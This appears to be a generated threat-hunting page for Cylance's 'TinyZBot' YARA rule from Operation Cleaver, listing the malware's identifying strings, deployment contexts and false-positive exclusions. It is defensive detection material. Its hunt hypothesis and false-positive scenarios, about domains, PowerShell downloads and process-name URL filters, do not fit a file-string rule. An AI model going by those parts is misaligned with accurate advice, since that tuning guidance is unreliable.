http://cylance.com/opcleaver

Hunt Hypothesis

The hypothesis is that the detected activity may indicate an adversary attempting to exfiltrate data or establish a covert communication channel using a malicious domain associated with the Cylance OP Cleaver tool. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify potential advanced persistent threats that may evade traditional detection methods.

YARA Rule

rule TinyZBot
{

  meta:
    author = "Cylance"
    date = "2014-12-02"
    description = "http://cylance.com/opcleaver"

  strings:
    $s1 = "NetScp" wide
    $s2 = "TinyZBot.Properties.Resources.resources"
    $s3 = "Aoao WaterMark"
    $s4 = "Run_a_exe"
    $s5 = "netscp.exe"
    $s6 = "get_MainModule_WebReference_DefaultWS"
    $s7 = "remove_CheckFileMD5Completed"
    $s8 = "http://tempuri.org/"
    $s9 = "Zhoupin_Cleaver"

  condition:
    ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9)
}

Deployment Notes

This YARA rule can be deployed in the following contexts:

• Microsoft Defender for Endpoint — Custom indicators / advanced hunting
• Email Gateway — Attachment scanning
• File Share Monitoring — Periodic scanning of shared drives
• YARA CLI — Manual threat hunting on endpoints

This rule contains 9 string patterns in its detection logic.

• Source Rule

False Positive Guidance

• Scenario: A system administrator is using PowerShell to perform a scheduled system cleanup task that involves downloading a script from a trusted internal repository.
  Filter/Exclusion: Exclude events where the source IP is from the internal network and the command line contains powershell.exe -Command with a known internal script URL.

• Scenario: A SQL Server Agent Job is configured to run a maintenance task that requires downloading a database backup from a remote server.
  Filter/Exclusion: Exclude events where the process name is sqlservr.exe and the destination path matches known backup directories.

• Scenario: A Windows Update task is initiated via Group Policy or WSUS, which temporarily downloads updates from Microsoft servers.
  Filter/Exclusion: Exclude events where the process name is wuauclt.exe and the URL contains windowsupdate.microsoft.com.

• Scenario: A CI/CD pipeline (e.g., Jenkins, GitLab CI) is pulling code from a remote Git repository as part of a deployment process.
  Filter/Exclusion: Exclude events where the process name is java.exe (or the relevant CI tool) and the URL matches a known Git repository URL.

• Scenario: A log management tool (e.g., Splunk, ELK Stack) is configured to fetch logs from a remote server for centralized logging.
  Filter/Exclusion: Exclude events where the process name is splunkd.exe (or the relevant log tool) and the URL is a known internal log server.